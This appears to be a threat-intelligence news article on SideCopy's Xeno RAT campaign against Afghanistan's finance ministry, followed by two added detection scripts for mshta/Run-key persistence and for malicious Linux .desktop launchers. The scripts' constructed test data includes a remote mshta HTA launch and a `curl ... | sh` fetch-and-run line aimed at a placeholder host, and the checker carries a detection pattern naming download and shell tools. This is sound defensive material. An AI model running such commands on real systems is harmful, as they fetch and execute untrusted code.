SideCopy APT Hits Afghanistan Finance Ministry with Xeno RAT in Operation XENOFISCAL
Researchers at Seqrite Labs have uncovered a spear-phishing campaign, dubbed Operation XENOFISCAL and attributed to the Pakistan-aligned SideCopy threat group, that targets Afghanistan's Ministry of Finance and several provincial revenue directorates. The operation opens with a ZIP archive containing a malicious Windows shortcut (LNK) file whose carefully crafted Pashto-language filename reflects the attackers' familiarity with Afghan government circles. Pashto-speaking officials and provincial-level government employees are also in the crosshairs, suggesting a broad intelligence-gathering effort aimed at South Asian financial institutions. Organizations can check suspicious domains used in such lures with a WHOIS lookup to identify recently registered or anonymized infrastructure.
Once executed, the LNK file abuses mshta.exe to fetch a remote HTML Application (HTA) from a compromised Afghan education domain, triggering in-memory execution of obfuscated JavaScript. The payload establishes Registry-based persistence by masquerading as Microsoft Edge, then uses a DLL-based loader to drop Xeno RAT 1.8.7 alongside a decoy document. SideCopy operates under the broader Transparent Tribe (APT36) umbrella, and this activity mirrors an April 2025 wave in which the group deployed Xeno RAT, Spark RAT, and CurlBack RAT against Indian entities, reinforcing its sustained focus on regional government targets.
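The two behaviours in the chain above that leave the clearest host telemetry are mshta.exe being handed a URL and a Run-key value that borrows Edge's name; the article's closing advice to restrict mshta.exe and watch Registry changes targets exactly these. The following script is an added example, not code from Seqrite Labs or from the report. It runs two rules over constructed Sysmon-style process-creation (EventID 1) and registry-value-set (EventID 13) records; the Edge install directories it trusts are an assumption about default installs, and every path, SID and URL in the sample data is made up.

```python
"""Detection sketch for the LNK -> mshta.exe -> remote HTA -> Registry-persistence
chain. Hypothetical example: the records below are constructed, not real telemetry,
and EDGE_REAL_DIRS assumes a default Microsoft Edge installation."""
import json
import re
from typing import Iterable, List, Tuple

# Constructed telemetry; field names mirror Sysmon EventID 1 (process create)
# and EventID 13 (registry value set), every value is invented for this example.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 1,
                "Image": r"C:\Windows\System32\mshta.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r'"C:\Windows\System32\mshta.exe" https://example.invalid/stage.hta'}),
    json.dumps({"EventID": 1,
                "Image": r"C:\Windows\System32\mshta.exe",
                "ParentImage": r"C:\Program Files\Vendor\App.exe",
                "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"'}),
    json.dumps({"EventID": 13,
                "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpdate",
                "Details": r"C:\Users\user\AppData\Roaming\Edge\msedge.exe"}),
    json.dumps({"EventID": 13,
                "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch",
                "Details": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'}),
    json.dumps({"EventID": 13,
                "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
                "Details": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"}),
]

URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
EDGE_RE = re.compile(r"edge", re.IGNORECASE)
# Assumed default locations of a genuine Edge binary (lower-cased for comparison).
EDGE_REAL_DIRS = (
    r"c:\program files (x86)\microsoft\edge\application",
    r"c:\program files\microsoft\edge\application",
)


def _exe_path(details: str) -> str:
    """Return the executable path from a Run-key value, dropping any arguments."""
    details = details.strip()
    if details.startswith('"'):
        return details[1:].split('"', 1)[0].lower()
    return details.split(" ", 1)[0].lower()


def detect(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (rule, evidence) pairs for each record that matches a rule."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("EventID") == 1:
            # Rule 1: mshta.exe given a URL, i.e. a remote HTA pulled for in-memory execution.
            cmd = ev.get("CommandLine", "")
            if ev.get("Image", "").lower().endswith("\\mshta.exe") and URL_RE.search(cmd):
                findings.append(("mshta_remote_hta", cmd))
        elif ev.get("EventID") == 13:
            # Rule 2: a Run-key entry that uses Edge's name but points outside Edge's install dir.
            target, details = ev.get("TargetObject", ""), ev.get("Details", "")
            value_name = target.rsplit("\\", 1)[-1]
            if RUN_KEY_RE.search(target) and (EDGE_RE.search(value_name) or EDGE_RE.search(details)):
                path = _exe_path(details)
                if not any(path.startswith(d + "\\") for d in EDGE_REAL_DIRS):
                    findings.append(("edge_masquerade_runkey", target))
    return findings


if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {evidence}")
```

Of the five constructed records only the first (mshta.exe with an HTTPS URL) and the third (an "Edge" Run-key value pointing into a user's AppData\Roaming directory) are flagged; the local-HTA launch, the genuine Edge auto-launch entry and the OneDrive entry pass. Rule 2 deliberately keys on the value name or data mentioning Edge rather than on a fixed malicious name, so it survives the attacker renaming the entry as long as the binary still lives outside the real install path.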
Xeno RAT is an open-source remote access trojan that communicates with its operator over TCP. It can load external DLL modules, exfiltrate data, perform file operations, log keystrokes, capture screenshots and clipboard content, monitor the webcam and microphone, and tunnel network traffic through a SOCKS5 proxy. Defenders monitoring for such C2 traffic can use a port scanner to identify unexpected listeners on endpoints and a DNS leak test to detect anomalous outbound resolution patterns.
The disclosure coincides with a separate report on Transparent Tribe using weaponized Linux .desktop files, delivered through WhatsApp-based social engineering, to target Indian military and defense infrastructure with lures themed around armored vehicle procurement contracts. According to researcher R.D. Tarun, the staged shell payload execution pattern points to evolving tradecraft that extends the group's reach across both Windows and Linux environments in South Asia. As SideCopy continues to iterate, security teams are urged to harden email gateways, restrict mshta.exe usage, and monitor Registry modifications associated with Edge-mimicking persistence.
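A .desktop launcher is a plain INI-style text file, so the "staged shell payload" pattern mentioned for the Linux lures can be triaged statically before a file is ever double-clicked. The checker below is an added example, not code from the report or from any vendor: it parses the `[Desktop Entry]` section and flags an `Exec=` line that hands a command string to a shell and fetches or decodes further content. The third heuristic, an Application entry named like a document, is a general masquerading check the article does not itself describe. Both sample launchers are constructed.

```python
"""Static triage for Linux .desktop launchers. Hypothetical example; the two
entries below are constructed, and the 'named like a document' heuristic is a
general assumption rather than a behaviour taken from the report."""
import configparser
import os
import re
import shlex
from typing import List

SHELLS = {"sh", "bash", "dash", "zsh"}
# Second-stage fetch/decode tooling, or a pipe straight into a shell.
STAGING_RE = re.compile(r"\b(curl|wget|base64|python3?|perl|nohup)\b|\|\s*(ba)?sh\b", re.IGNORECASE)
DOC_NAME_RE = re.compile(r"\.(pdf|docx?|xlsx?)$", re.IGNORECASE)

# Constructed: an ordinary browser launcher.
BENIGN = """[Desktop Entry]
Type=Application
Name=Web Browser
Exec=firefox %u
Terminal=false
"""

# Constructed: a launcher that runs a shell one-liner pulling a second stage,
# then opens a decoy so the victim sees a document. Domain is a placeholder.
SUSPICIOUS = """[Desktop Entry]
Type=Application
Name=Procurement_Contract.pdf
Icon=application-pdf
Exec=bash -c "curl -s http://example.invalid/s1 | sh; xdg-open /tmp/decoy.pdf"
Terminal=false
"""


def analyse_desktop(text: str) -> List[str]:
    """Return the list of reasons a launcher looks suspicious (empty if none)."""
    cp = configparser.ConfigParser(interpolation=None)  # '%u' style field codes are literal
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        return ["no [Desktop Entry] section"]
    entry = cp["Desktop Entry"]
    exec_line = entry.get("Exec", "")
    try:
        argv = shlex.split(exec_line)
    except ValueError:
        return ["unparseable Exec line"]
    reasons = []
    if argv and os.path.basename(argv[0]) in SHELLS and "-c" in argv[1:]:
        reasons.append("Exec spawns a shell with -c")
    if STAGING_RE.search(exec_line):
        reasons.append("Exec fetches or decodes further content")
    if entry.get("Type", "") == "Application" and DOC_NAME_RE.search(entry.get("Name", "")):
        reasons.append("Application entry named like a document")
    return reasons


if __name__ == "__main__":
    for label, text in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, analyse_desktop(text) or ["clean"])
```

Run against a directory of launchers (for example `~/.local/share/applications` or a mail download folder) this gives a cheap first pass; anything hitting the first two rules together deserves a look at the fetched URL in a sandbox rather than on the user's machine.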